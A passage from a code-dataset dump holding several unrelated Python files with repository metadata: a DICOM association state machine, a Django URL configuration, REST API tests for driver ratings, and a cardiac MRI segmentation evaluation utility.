provider.ToServiceUser.put(provider.primitive)
def AA_5(provider):
# Stop ARTIM timer.
provider.Timer.Stop()
def AA_6(provider):
# Ignore PDU.
provider.primitive = None
def AA_7(provider):
# Send A-ABORT PDU.
provider.pdu = PDU.A_ABORT_PDU()
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
def AA_8(provider):
# Send A-ABORT PDU (service-provider source), issue and A-P-ABORT
# indication, and start ARTIM timer.
# Send A-ABORT PDU
provider.pdu = PDU.A_ABORT_PDU()
provider.pdu.Source = 2
provider.pdu.ReasonDiag = 0 # No reason given
if provider.RemoteClientSocket:
provider.RemoteClientSocket.send(provider.pdu.Encode())
# Issue A-P-ABORT indication
provider.ToServiceUser.put(provider.primitive)
provider.Timer.Start()
# Finite State Machine
# states
states = {
# No association
'Sta1': 'Idle',
# Association establishment
'Sta2': 'Transport Connection Open (Awaiting A-ASSOCIATE-RQ PDU)',
'Sta3': 'Awaiting Local A-ASSOCIATE response primitive (from local user)',
'Sta4': 'Awaiting transport connection opening to complete (from local '
'transport service',
'Sta5': 'Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU',
# Data transfer
'Sta6': 'Association established and ready for data transfer',
# Association release
'Sta7': 'Awaiting A-RELEASE-RP PDU',
'Sta8': 'Awaiting local A-RELEASE response primitive (from local user)',
'Sta9': 'Release collision requestor side; awaiting A-RELEASE response '
' (from local user)',
'Sta10': 'Release collision acceptor side; awaiting A-RELEASE-RP PDU',
'Sta11': 'Release collision requestor side; awaiting A-RELEASE-RP PDU',
'Sta12': 'Release collision acceptor side; awaiting A-RELEASE response '
'primitive (from local user)',
'Sta13': 'Awaiting Transport Connection Close Indication (Association no '
'longer exists)'
}
# actions
actions = {
# Association establishment actions
'AE-1': ('Issue TransportConnect request primitive to local transport '
'service', AE_1, 'Sta4'),
'AE-2': ('Send A_ASSOCIATE-RQ PDU', AE_2, 'Sta5'),
'AE-3': ('Issue A-ASSOCIATE confirmation (accept) primitive', AE_3,
'Sta6'),
'AE-4': ('Issue A-ASSOCIATE confirmation (reject) primitive and close '
'transport connection', AE_4, 'Sta1'),
'AE-5': ('Issue transport connection response primitive; start ARTIM '
'timer', AE_5, 'Sta2'),
'AE-6': ('Check A-ASSOCIATE-RQ', AE_6, ('Sta3', 'Sta13')),
'AE-7': ('Send A-ASSOCIATE-AC PDU', AE_7, 'Sta6'),
'AE-8': ('Send A-ASSOCIATE-RJ PDU', AE_8, 'Sta13'),
# Data transfer related actions
'DT-1': ('Send P-DATA-TF PDU', DT_1, 'Sta6'),
'DT-2': ('Send P-DATA indication primitive', DT_2, 'Sta6'),
# Assocation Release related actions
'AR-1': ('Send A-RELEASE-RQ PDU', AR_1, 'Sta7'),
'AR-2': ('Send A-RELEASE indication primitive', AR_2, 'Sta8'),
'AR-3': ('Issue A-RELEASE confirmation primitive and close transport '
'connection', AR_3, 'Sta1'),
'AR-4': ('Issue A-RELEASE-RP PDU and start ARTIM timer', AR_4, 'Sta13'),
'AR-5': ('Stop ARTIM timer', AR_5, 'Sta1'),
'AR-6': ('Issue P-DATA indication', AR_6, 'Sta7'),
'AR-7': ('Issue P-DATA-TF PDU', AR_7, 'Sta8'),
'AR-8': ('Issue A-RELEASE indication (release collision)', AR_8,
('Sta9', 'Sta10')),
'AR-9': ('Send A-RELEASE-RP PDU', AR_9, 'Sta11'),
'AR-10': ('Issue A-RELEASE confimation primitive', AR_10, 'Sta12'),
# Association abort related actions
'AA-1': ('Send A-ABORT PDU (service-user source) and start (or restart) '
'ARTIM timer', AA_1, 'Sta13'),
'AA-2': ('Stop ARTIM timer if running. Close transport connection', AA_2,
'Sta1'),
'AA-3': ('Issue A-ABORT or A-P-ABORT indication and close transport '
'connection', AA_3, 'Sta1'),
'AA-4': ('Issue A-P-ABORT indication primitive', AA_4, 'Sta1'),
'AA-5': ('Stop ARTIM timer', AA_5, 'Sta1'),
'AA-6': ('Ignore PDU', AA_6, 'Sta13'),
'AA-7': ('Send A-ABORT PDU', AA_6, 'Sta13'),
'AA-8': ('Send A-ABORT PDU, issue an A-P-ABORT indication and start '
'ARTIM timer', AA_8, 'Sta13')}
# events
events = {
'Evt1': "A-ASSOCIATE request (local user)",
'Evt2': "Transport connect confirmation (local transport service)",
'Evt3': "A-ASSOCIATE-AC PDU (received on transport connection)",
'Evt4': "A-ASSOCIATE-RJ PDU (received on transport connection)",
'Evt5': "Transport connection indication (local transport service)",
'Evt6': "A-ASSOCIATE-RQ PDU (on tranport connection)",
'Evt7': "A-ASSOCIATE response primitive (accept)",
'Evt8': "A-ASSOCIATE response primitive (reject)",
'Evt9': "P-DATA request primitive",
'Evt10': "P-DATA-TF PDU (on transport connection)",
'Evt11': "A-RELEASE request primitive",
'Evt12': "A-RELEASE-RQ PDU (on transport)",
'Evt13': "A-RELEASE-RP PDU (on transport)",
'Evt14': "A-RELEASE response primitive",
'Evt15': "A-ABORT request primitive",
'Evt16': "A-ABORT PDU (on transport)",
'Evt17': "Transport connection closed",
'Evt18': "ARTIM timer expired (rej/rel)",
'Evt19': "Unrecognized/invalid PDU"}
TransitionTable = {
('Evt1', 'Sta1'): 'AE-1',
('Evt2', 'Sta4'): 'AE-2',
('Evt3', 'Sta2'): 'AA-1',
('Evt3', 'Sta3'): 'AA-8',
('Evt3', 'Sta5'): 'AE-3',
('Evt3', 'Sta6'): 'AA-8',
('Evt3', 'Sta7'): 'AA-8',
('Evt3', 'Sta8'): 'AA-8',
('Evt3', 'Sta9'): 'AA-8',
('Evt3', 'Sta10'): 'AA-8',
('Evt3', 'Sta11'): 'AA-8',
('Evt3', 'Sta12'): 'AA-8',
('Evt3', 'Sta13'): 'AA-6',
('Evt4', 'Sta2'): 'AA-1',
('Evt4', 'Sta3'): 'AA-8',
('Evt4', 'Sta5'): 'AE-4',
('Evt4', 'Sta6'): 'AA-8',
('Evt4', 'Sta7'): 'AA-8',
('Evt4', 'Sta8'): 'AA-8',
('Evt4', 'Sta9'): 'AA-8',
('Evt4', 'Sta10'): 'AA-8',
('Evt4', 'Sta11'): 'AA-8',
('Evt4', 'Sta12'): 'AA-8',
('Evt4', 'Sta13'): 'AA-6',
('Evt5', 'Sta1'): 'AE-5',
('Evt6', 'Sta2'): 'AE-6',
('Evt6', 'Sta3'): 'AA-8',
('Evt6', 'Sta5'): 'AA-8',
('Evt6', 'Sta6'): 'AA-8',
('Evt6', 'Sta7'): 'AA-8',
('Evt6', 'Sta8'): 'AA-8',
('Evt6', 'Sta9'): 'AA-8',
('Evt6', 'Sta10'): 'AA-8',
('Evt6', 'Sta11'): 'AA-8',
('Evt6', 'Sta12'): 'AA-8',
('Evt6', 'Sta13'): 'AA-7',
('Evt7', 'Sta3'): 'AE-7',
('Evt8', 'Sta3'): 'AE-8',
('Evt9', 'Sta6'): 'DT-1',
('Evt9', 'Sta8'): 'AR-7',
('Evt10', 'Sta2'): 'AA-1',
('Evt10', 'Sta3'): 'AA-8',
('Evt10', 'Sta5'): 'AA-8',
('Evt10', 'Sta6'): 'DT-2',
('Evt10', 'Sta7'): 'AR-6',
('Evt10', 'Sta8'): 'AA-8',
('Evt10', 'Sta9'): 'AA-8',
('Evt10', 'Sta10'): 'AA-8',
('Evt10', 'Sta11'): 'AA-8',
('Evt10', 'Sta12'): 'AA-8',
('Evt10', 'Sta13'): 'AA-6',
('Evt11', 'Sta6'): 'AR-1',
('Evt12', 'Sta2'): 'AA-1',
('Evt12', 'Sta3'): 'AA-8',
('Evt12', 'Sta5'): 'AA-8',
('Evt12', 'Sta6'): 'AR-2',
('Evt12', 'Sta7'): 'AR-8',
('Evt12', 'Sta8'): 'AA-8',
('Evt12', 'Sta9'): 'AA-8',
('Evt12', 'Sta10'): 'AA-8',
('Evt12', 'Sta11'): 'AA-8',
('Evt12', 'Sta12'): 'AA-8',
('Evt12', 'Sta13'): 'AA-6',
('Evt13', 'Sta2'): 'AA-1',
('Evt13', 'Sta3'): 'AA-8',
('Evt13', 'Sta5'): 'AA-8',
('Evt13', 'Sta6'): 'AA-8',
('Evt13', 'Sta7'): 'AR-3',
('Evt13', 'Sta8'): 'AA-8',
('Evt13', 'Sta9'): 'AA-8',
('Evt13', 'Sta10'): 'AR-10',
('Evt13', 'Sta11'): 'AR-3',
('Evt13', 'Sta12'): 'AA-8',
('Evt13', 'Sta13'): 'AA-6',
('Evt14', 'Sta8'): 'AR-4',
('Evt14', 'Sta9'): 'AR-9',
('Evt14', 'Sta12'): 'AR-4',
('Evt15', 'Sta3'): 'AA-1',
('Evt15', 'Sta4'): 'AA-2',
('Evt15', 'Sta5'): 'AA-1',
('Evt15', 'Sta6'): 'AA-1',
('Evt15', 'Sta7'): 'AA-1',
('Evt15', 'Sta8'): 'AA-1',
('Evt15', 'Sta9'): 'AA-1',
('Evt15', 'Sta10'): 'AA-1',
('Evt15', 'Sta11'): 'AA-1',
('Evt15', 'Sta12'): 'AA-1',
('Evt16', 'Sta2'): 'AA-2',
('Evt16', 'Sta3'): 'AA-3',
('Evt16', 'Sta5'): 'AA-3',
('Evt16', 'Sta6'): 'AA-3',
('Evt16', 'Sta7'): 'AA-3',
('Evt16', 'Sta8'): 'AA-3',
('Evt16', 'Sta9'): 'AA-3',
('Evt16', 'Sta10'): 'AA-3',
('Evt16', 'Sta11'): 'AA-3',
('Evt16', 'Sta12'): 'AA-3',
('Evt16', 'Sta13'): 'AA-2',
('Evt17', 'Sta2'): 'AA-5',
('Evt17', 'Sta3'): 'AA-4',
('Evt17', 'Sta4'): 'AA-4',
('Evt17', 'Sta5'): 'AA-4',
('Evt17', 'Sta6'): 'AA-4',
('Evt17', 'Sta7'): 'AA-4',
('Evt17', 'Sta8'): 'AA-4',
('Evt17', 'Sta9'): 'AA-4',
('Evt17', 'Sta10'): 'AA-4',
('Evt17', 'Sta11'): 'AA-4',
('Evt17', 'Sta12'): 'AA-4',
('Evt17', 'Sta13'): 'AR-5',
('Evt18', 'Sta2'): 'AA-2',
('Evt18', 'Sta13'): 'AA-2',
('Evt19', 'Sta2'): 'AA-1',
('Evt19', 'Sta3'): 'AA-8',
('Evt19', 'Sta5'): 'AA-8',
('Evt19', 'Sta6'): 'AA-8',
('Evt19', 'Sta7'): 'AA-8',
('Evt19', 'Sta8'): 'AA-8',
('Evt19', 'Sta9'): 'AA-8',
('Evt19', 'Sta10'): 'AA-8',
('Evt19', 'Sta11'): 'AA-8',
('Evt19', 'Sta12'): 'AA-8',
('Evt19', 'Sta13'): 'AA-7'}
class StateMachine:
def __init__(self, provider):
self.CurrentState = 'Sta1'
self.provider = provider
def Action(self, event, c):
""" Execute the action triggered by event """
try:
action_name = TransitionTable[(event, self.CurrentState)]
except:
logger.debug('%s: current state is: %s %s' %
(self.provider.name, self.CurrentState,
states[self.CurrentState]))
logger.debug('%s: event: %s %s' %
(self.provider.name, event, events[event]))
raise
return
action = actions[action_name]
try:
logger.debug('')
logger.debug('%s: current state is: %s %s' %
(self.provider.name, self.CurrentState,
states[self.CurrentState]))
logger.debug('%s: event: %s %s' %
(self.provider.name, event, events[event]))
logger.debug('%s: entering action: (%s, %s) %s %s' %
(self.provider.name, event, self.CurrentState,
action_name, actions[action_name][0]))
action[1](c)
#if type(action[2]) != type(()):
if not isinstance(action[2], tuple):
# only one next state possible
self.CurrentState = action[2]
logger.debug('%s: action complete. State is now %s %s' %
(self.provider.name, self.CurrentState,
states[self.CurrentState]))
except:
raise
self.provider.Kill()
def NextState(self, state):
self.CurrentState = state
|
[
"hrishi.kb@gmail.com"
] |
hrishi.kb@gmail.com
|
86ceac536ce6d9ab5f58bc68e69c28ecf2be5b99
|
9676e901d4d81e963206ce292a8823e774a4273a
|
/my_app/urls.py
|
7c33b5b09b32c5e5e2280abc4e03a3efe425f9a1
|
[] |
no_license
|
zhoumo753/ttdjg
|
273a41bc6e1ec8611f089dc1362eb9e1af134694
|
5ad53c456e8fafbec92837669629798a2e36dbe0
|
refs/heads/master
| 2022-12-08T18:29:44.892142
| 2020-09-11T07:15:28
| 2020-09-11T07:15:28
| 294,616,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
from django.urls import path,include
from . import views
urlpatterns = [
path('grades/',views.grades),
path('students/',views.students),
path('geturl1',views.geturl1),
path('showregister/', views.showregist),
path('showregister/register/', views.regist),
path('redirect1/', views.redirect1),
path('redirect2/', views.redirect2),
path('showmain/',views.showmain),
path('main/',views.main),
path('login/',views.login),
path('quit/',views.quit),
path('',views.index),
]
|
[
"1152081647@qq.com"
] |
1152081647@qq.com
|
87449d04887b5c41d56c5bb0801dda692a8c3d63
|
927a63ad2a514c9aea72e641634907d6f88121d6
|
/app/racing/tests/test_ratings_api.py
|
45f23086bf6c8762b8d1adfbea412ffecb5532f6
|
[
"MIT"
] |
permissive
|
bartisrichard/formula-one
|
ecc2534c3d8250048893fee9a76be79a37d7a1f4
|
de14da6b1dcbd09d3ed5685d3a4f2f4f7934d908
|
refs/heads/main
| 2023-07-19T03:59:29.098308
| 2021-08-22T13:03:54
| 2021-08-22T13:03:54
| 398,193,892
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,599
|
py
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Rating
from racing.serializers import RatingSerializer
RATINGS_URL = reverse('racing:rating-list')
class PublicRatingsApiTests(TestCase):
def setUp(self):
self.client = APIClient()
def test_login_required(self):
res = self.client.get(RATINGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRatingsAPITests(TestCase):
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'test@acetech.dev',
'testpass'
)
self.client.force_authenticate(self.user)
def test_retrieve_rating_list(self):
Rating.objects.create(user=self.user, name='carlos_sainz_rating', overall=87, experience=69, racecraft=88, awareness=94, pace=85)
Rating.objects.create(user=self.user, name='fernando_alonso_rating', overall=89, experience=99, racecraft=89, awareness=94, pace=86)
res = self.client.get(RATINGS_URL)
ratings = Rating.objects.all().order_by('-name')
serializer = RatingSerializer(ratings, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_ratings_limited_to_user(self):
user2 = get_user_model().objects.create_user(
'other@acetech.dev',
'testpass'
)
Rating.objects.create(user=user2, name='carlos_sainz_rating', overall=87, experience=69, racecraft=88, awareness=94, pace=85)
rating = Rating.objects.create(user=self.user, name='fernando_alonso_rating', overall=89, experience=99, racecraft=89, awareness=94, pace=86)
res = self.client.get(RATINGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], rating.name)
"""def test_create_ingredient_successful(self):
payload = {'name': 'Cabbage'}
self.client.post(INGREDIENTS_URL, payload)
exists = Ingredient.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
def test_create_ingredient_invalid(self):
payload = {'name': ''}
res = self.client.post(INGREDIENTS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)"""
|
[
"88649875+bartisrichard@users.noreply.github.com"
] |
88649875+bartisrichard@users.noreply.github.com
|
8220824c53567575e26f018ed0478e637a696b5d
|
e196ace4119ad3eb71d75856763cfa90c0576ace
|
/task_driven_data_augmentation/f1_utils.py
|
591cc836c1d3db41a1767850ed40d9a463779c17
|
[] |
no_license
|
dpaolella/restoration-mapper
|
ba1304832aa2001514506f3a1cd79834030ba721
|
622e23d93216e577d3583f034c8ff7366394599a
|
refs/heads/master
| 2023-07-25T05:04:50.422122
| 2020-05-11T19:49:54
| 2020-05-11T19:49:54
| 250,290,582
| 0
| 5
| null | 2023-07-06T21:27:41
| 2020-03-26T15:04:43
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 19,533
|
py
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import f1_score
import nibabel as nib
#to make directories
import pathlib
from skimage import transform
from scipy.ndimage import morphology
from array2gif import write_gif
class f1_utilsObj:
def __init__(self,cfg,dt):
#print('f1 utils init')
self.img_size_x=cfg.img_size_x
self.img_size_y=cfg.img_size_y
self.batch_size=cfg.batch_size
self.num_classes=cfg.num_classes
self.num_channels=cfg.num_channels
self.interp_val = cfg.interp_val
self.target_resolution=cfg.target_resolution
self.data_path_tr=cfg.data_path_tr
self.dt=dt
def surfd(self,input1, input2, sampling=1, connectivity=1):
'''
function to compute the surface distance
input params:
input1: predicted segmentation mask
input2: ground truth mask
sampling: default value
connectivity: default value
returns:
sds : surface distance
'''
input_1 = np.atleast_1d(input1.astype(np.bool))
input_2 = np.atleast_1d(input2.astype(np.bool))
conn = morphology.generate_binary_structure(input_1.ndim, connectivity)
#binary erosion on input1
y=morphology.binary_erosion(input_1, conn)
y=y.astype(np.float32)
x=input_1.astype(np.float32)
S=x-y
#binary erosion on input2
y=morphology.binary_erosion(input_2, conn)
y=y.astype(np.float32)
x=input_2.astype(np.float32)
Sprime=x-y
S=S.astype(np.bool)
Sprime=Sprime.astype(np.bool)
dta = morphology.distance_transform_edt(~S,sampling)
dtb = morphology.distance_transform_edt(~Sprime,sampling)
sds = np.concatenate([np.ravel(dta[Sprime!=0]), np.ravel(dtb[S!=0])])
return sds
def calc_pred_sf_mask(self, sess, ae, labeled_data_imgs, axis_no=2):
"""
To compute the predicted segmentation for an input stack of 2D slices
input params:
sess: current session
ae: graph name
labeled_data_imgs: input 3D volume
axis_no:
returns:
mergedlist_y_pred: predicted segmentation masks of all 2D slices
"""
total_slices = labeled_data_imgs.shape[axis_no]
for slice_no in range(total_slices):
img_test_slice = np.reshape(labeled_data_imgs[:, :, slice_no], (1, self.img_size_x, self.img_size_y, 1))
seg_pred = sess.run(ae['y_pred'], feed_dict={ae['x']: img_test_slice, ae['train_phase']: False})
# Merging predicted labels of slices(2D) of test image into one volume(3D) of predicted labels
if (slice_no == 0):
mergedlist_y_pred = np.reshape(seg_pred, (1,self.img_size_x, self.img_size_y, self.num_classes))
else:
seg_pred_final = np.reshape(seg_pred, (1,self.img_size_x, self.img_size_y, self.num_classes))
mergedlist_y_pred = np.concatenate((mergedlist_y_pred, seg_pred_final), axis=0)
return mergedlist_y_pred
def calc_pred_sf_mask_full(self, sess, ae, labeled_data_imgs):
'''
To compute the predicted segmentation for an input 3D volume
input params:
sess: current session
ae: graph name
labeled_data_imgs: input 3D volume
returns:
seg_pred: predicted segmentation mask of 3D volume
'''
test_data = labeled_data_imgs
seg_pred = sess.run(ae['y_pred'], feed_dict={ae['x']: test_data, ae['train_phase']: False})
return seg_pred
def reshape_img_and_f1_score(self, predicted_img_arr, gt_mask, pixel_size):
'''
To reshape image into the target resolution and then compute the f1 score w.r.t ground truth mask
input params:
predicted_img_arr: predicted segmentation mask that is computed over the re-sampled and cropped input image
gt_mask: ground truth mask in native image resolution
pixel_size: native image resolution
returns:
predictions_mask: predictions mask in native resolution (re-sampled and cropped/zeros append as per size requirements)
f1_val: f1 score over predicted segmentation masks vs ground truth
'''
nx,ny= self.img_size_x,self.img_size_y
scale_vector = (pixel_size[0] / self.target_resolution[0], pixel_size[1] / self.target_resolution[1])
mask_rescaled = transform.rescale(gt_mask[:, :, 0], scale_vector, order=0, preserve_range=True, mode='constant')
x, y = mask_rescaled.shape[0],mask_rescaled.shape[1]
x_s = (x - nx) // 2
y_s = (y - ny) // 2
x_c = (nx - x) // 2
y_c = (ny - y) // 2
total_slices = predicted_img_arr.shape[0]
predictions_mask = np.zeros((gt_mask.shape[0],gt_mask.shape[1],total_slices))
for slice_no in range(total_slices):
# ASSEMBLE BACK THE SLICES
slice_predictions = np.zeros((x,y,self.num_classes))
predicted_img=predicted_img_arr[slice_no,:,:,:]
# insert cropped region into original image again
if x > nx and y > ny:
slice_predictions[x_s:x_s+nx, y_s:y_s+ny,:] = predicted_img
else:
if x <= nx and y > ny:
slice_predictions[:, y_s:y_s+ny,:] = predicted_img[x_c:x_c+ x, :,:]
elif x > nx and y <= ny:
slice_predictions[x_s:x_s + nx, :,:] = predicted_img[:, y_c:y_c + y,:]
else:
slice_predictions[:, :,:] = predicted_img[x_c:x_c+ x, y_c:y_c + y,:]
# RESCALING ON THE LOGITS
prediction = transform.resize(slice_predictions,
(gt_mask.shape[0], gt_mask.shape[1], self.num_classes),
order=1,
preserve_range=True,
mode='constant')
#print("b",prediction.shape)
prediction = np.uint16(np.argmax(prediction, axis=-1))
predictions_mask[:,:,slice_no]=prediction
#Calculate F1 score
#y_pred= predictions_mask.flatten()
#y_true= gt_mask.flatten()
#f1_val= f1_score(y_true, y_pred, average=None)
f1_val = self.calc_f1_score(predictions_mask,gt_mask)
return predictions_mask,f1_val
def calc_f1_score(self,predictions_mask,gt_mask):
'''
to compute f1/dice score
input params:
predictions_arr: predicted segmentation mask
mask: ground truth mask
returns:
f1_val: f1/dice score
'''
y_pred= predictions_mask.flatten()
y_true= gt_mask.flatten()
f1_val= f1_score(y_true, y_pred, average=None)
return f1_val
def pred_segs_acdc_test_subjs(self, sess,ae, save_dir,orig_img_dt,test_list,struct_name,print_assd_hd_scores=0):
'''
To estimate the segmentation masks of test images and compute their f1 score and plot the predicted segmentations.
input params:
sess: current session
ae: current model graph
save_dir: save directory for the inference of test images
orig_img_dt: dataloader of acdc data
test_list: list of patient test ids
struct_name: list of structures to segment. Here its Right ventricle (RV), myocardium (MYO), left ventricle (LV) in the heart MRI.
returns:
None
'''
count=0
# Load each test image
for test_id in test_list:
test_id_l=[test_id]
#load image,label pairs and process it to chosen resolution and dimensions
img_sys,label_sys,pixel_size,affine_tst= orig_img_dt(test_id_l,ret_affine=1)
cropped_img_sys,cropped_mask_sys = self.dt.preprocess_data(img_sys, label_sys, pixel_size)
# Make directory for the test image with id number
seg_model_dir=str(save_dir)+'pred_segs/'+str(test_id)+'/'
pathlib.Path(seg_model_dir).mkdir(parents=True, exist_ok=True)
# Calc dice score and predicted segmentation & store in a txt file
pred_sf_mask = self.calc_pred_sf_mask(sess, ae, cropped_img_sys, axis_no=2)
re_pred_mask_sys,f1_val = self.reshape_img_and_f1_score(pred_sf_mask, label_sys, pixel_size)
#print("mean f1_val", f1_val)
savefile_name = str(seg_model_dir)+'mean_f1_dice_coeff_test_id_'+str(test_id)+'.txt'
np.savetxt(savefile_name, f1_val, fmt='%s')
# Save the segmentation in nrrd files & plot some sample images
self.plot_predicted_seg_ss(img_sys,label_sys,re_pred_mask_sys,seg_model_dir,test_id)
#save the nifti segmentation file
array_img = nib.Nifti1Image(re_pred_mask_sys.astype(np.int16), affine_tst)
pred_filename = str(seg_model_dir)+'pred_seg_id_'+str(test_id)+'.nii.gz'
nib.save(array_img, pred_filename)
dsc_tmp=np.reshape(f1_val[1:self.num_classes], (1, self.num_classes - 1))
if(print_assd_hd_scores==1):
assd_list=[]
hd_list=[]
for index in range(1,self.num_classes):
surface_distance = self.surfd((re_pred_mask_sys==index), (label_sys==index))
msd = surface_distance.mean()
hd=surface_distance.max()
assd_list.append(msd)
hd_list.append(hd)
filename_msd=str(seg_model_dir)+'assd_test_id_'+str(test_id)+'.txt'
filename_hd=str(seg_model_dir)+'hd_test_id_'+str(test_id)+'.txt'
np.savetxt(filename_msd,assd_list,fmt='%s')
np.savetxt(filename_hd,hd_list,fmt='%s')
assd_tmp=np.reshape(np.asarray(assd_list),(1,self.num_classes-1))
hd_tmp=np.reshape(np.asarray(hd_list),(1,self.num_classes-1))
if(count==0):
dsc_all=dsc_tmp
if(print_assd_hd_scores==1):
assd_all=assd_tmp
hd_all=hd_tmp
count=1
else:
dsc_all=np.concatenate((dsc_all, dsc_tmp))
if(print_assd_hd_scores==1):
assd_all=np.concatenate((assd_all, assd_tmp))
hd_all=np.concatenate((hd_all, hd_tmp))
#for DSC
val_list=[]
val_list_mean=[]
for i in range(0,self.num_classes-1):
dsc=dsc_all[:,i]
#DSC
#val_list.append(round(np.mean(dsc), 3))
val_list.append(round(np.median(dsc), 3))
val_list.append(round(np.std(dsc), 3))
val_list_mean.append(round(np.mean(dsc), 3))
filename_save=str(save_dir)+'pred_segs/'+str(struct_name[i])+'_20subjs_dsc.txt'
np.savetxt(filename_save,dsc,fmt='%s')
filename_save=str(save_dir)+'pred_segs/'+'median_std_dsc.txt'
np.savetxt(filename_save,val_list,fmt='%s')
filename_save=str(save_dir)+'pred_segs/'+'mean_dsc.txt'
np.savetxt(filename_save,val_list_mean,fmt='%s')
#filename_save=str(save_dir)+'pred_segs/'+'net_dsc_mean.txt'
#net_mean_dsc=[]
#net_mean_dsc.append(round(np.mean(val_list_mean),3))
#np.savetxt(filename_save,net_mean_dsc,fmt='%s')
if(print_assd_hd_scores==1):
#for ASSD
val_list=[]
val_list_mean=[]
#for HD
hd_val_list=[]
hd_val_list_mean=[]
for i in range(0,self.num_classes-1):
assd=assd_all[:,i]
hd=hd_all[:,i]
#ASSD
#val_list.append(round(np.mean(assd), 3))
val_list.append(round(np.median(assd), 3))
val_list.append(round(np.std(assd), 3))
val_list_mean.append(round(np.mean(assd), 3))
filename_save=str(save_dir)+'pred_segs/'+str(struct_name[i])+'_20subjs_assd.txt'
np.savetxt(filename_save,assd,fmt='%s')
#HD
#hd_val_list.append(round(np.mean(hd), 3))
hd_val_list.append(round(np.median(hd), 3))
hd_val_list.append(round(np.std(hd), 3))
hd_val_list_mean.append(round(np.mean(hd), 3))
filename_save=str(save_dir)+'pred_segs/'+str(struct_name[i])+'_20subjs_hd.txt'
np.savetxt(filename_save,hd,fmt='%s')
filename_save=str(save_dir)+'pred_segs/'+'median_std_assd.txt'
np.savetxt(filename_save,val_list,fmt='%s')
filename_save=str(save_dir)+'pred_segs/'+'assd_mean.txt'
np.savetxt(filename_save,val_list_mean,fmt='%s')
filename_save=str(save_dir)+'pred_segs/'+'median_std_hd.txt'
np.savetxt(filename_save,hd_val_list,fmt='%s')
filename_save=str(save_dir)+'pred_segs/'+'hd_mean.txt'
np.savetxt(filename_save,hd_val_list_mean,fmt='%s')
def plot_predicted_seg_ss(self, test_data_img,test_data_labels,predicted_labels,save_dir,test_id):
'''
To plot the original image, ground truth mask and predicted mask
input params:
test_data_img: test image to be plotted
test_data_labels: test image GT mask to be plotted
predicted_labels: predicted mask of the test image
save_dir: directory where to save the plot
test_id: patient id number of the dataset
returns:
None
'''
n_examples=3
fig, axs = plt.subplots(3, n_examples, figsize=(10, 10))
fig.suptitle('Predicted Seg',fontsize=10)
for example_i in range(n_examples):
if(example_i==0):
axs[0][0].set_title('test image')
axs[1][0].set_title('ground truth mask')
axs[2][0].set_title('predicted mask')
axs[0][example_i].imshow(test_data_img[:,:,example_i*2],cmap='gray')
axs[1][example_i].imshow(test_data_labels[:,:,example_i*2])
axs[2][example_i].imshow(np.squeeze(predicted_labels[:,:,example_i*2]))
axs[0][example_i].axis('off')
axs[1][example_i].axis('off')
axs[2][example_i].axis('off')
savefile_name=str(save_dir)+'tst'+str(test_id)+'_predicted_segmentation_masks.png'
fig.savefig(savefile_name)
plt.close('all')
def plot_deformed_imgs(self,ld_img_batch,y_geo_deformed,flow_vec,save_dir,index):
'''
To plot the different deformation fields generated from different z's sampled.
These deformation fields are applied on a single image to illustrate different augmented images that can be generated from a single image.
input params:
ld_img_batch: input labeled image
y_geo_deformed: deformed images (non-affine spatial transformation applied)
flow_vec: deformation fields
returns:
None
'''
save_dir_tmp=str(save_dir)+'/plots/'
pathlib.Path(save_dir_tmp).mkdir(parents=True, exist_ok=True)
savefile_name_tmp=str(save_dir_tmp)+'deformed_imgs_for_different_z_sampled_for_'
max_val=5
step_update=1
#def for quiver plot
X, Y = np.meshgrid(np.arange(0, self.img_size_x, 1), np.arange(0, self.img_size_y, 1))
#every 10th arrow to plot
t=10
plt.figure(figsize=(18,6))
plt.suptitle('orig vs deformed imgs')
for i in range(0,max_val,step_update):
train_slice=np.squeeze(ld_img_batch[i,:,:,0])
y_deformed_slice=np.squeeze(y_geo_deformed[i,:,:,0])
v_x=np.squeeze(flow_vec[i,:,:,0])
v_y=np.squeeze(flow_vec[i,:,:,1])
if(i==0):
plt.subplot(2, max_val+1, 1)
plt.title('orig img')
plt.imshow(train_slice,cmap='gray')
plt.axis('off')
plt.subplot(2, max_val+1, i+2)
if(i==0):
plt.title('deformation field over imgs -->')
plt.imshow(train_slice,cmap='gray')
plt.quiver(X[::t, ::t], Y[::t, ::t], v_x[::t, ::t], v_y[::t, ::t], pivot='mid', units='inches',color='yellow')
plt.axis('off')
plt.subplot(2, max_val+1, max_val+1+i+2)
if(i==0):
plt.title('deformed imgs -->')
plt.imshow(y_deformed_slice,cmap='gray')
plt.axis('off')
savefile_name=str(savefile_name_tmp)+'i_'+str(index)+'.png'
plt.savefig(savefile_name)
plt.close('all')
def plot_intensity_transformed_imgs(self,ld_img_batch,y_int_deformed,int_vec,save_dir,index):
'''
To plot the different intensity fields generated from different z's sampled.
These intensity fields are applied on a single image to illustrate different augmented images that can be generated from a single image.
input params:
ld_img_batch: input labeled image
y_int_deformed: intensity transformed images
int_vec: intensity fields
returns:
None
'''
save_dir_tmp=str(save_dir)+'/plots/'
pathlib.Path(save_dir_tmp).mkdir(parents=True, exist_ok=True)
savefile_name_tmp=str(save_dir_tmp)+'intensity_transformed_imgs_for_different_z_sampled_for_'
max_val=5
step_update=1
plt.figure(figsize=(18,6))
plt.suptitle('orig vs intensity transformed imgs')
for i in range(0,max_val,step_update):
train_slice=np.squeeze(ld_img_batch[i,:,:,0])
y_deformed_slice=np.squeeze(y_int_deformed[i,:,:,0])
int_slice=np.squeeze(int_vec[i,:,:,0])
if(i==0):
plt.subplot(2, max_val+1, 1)
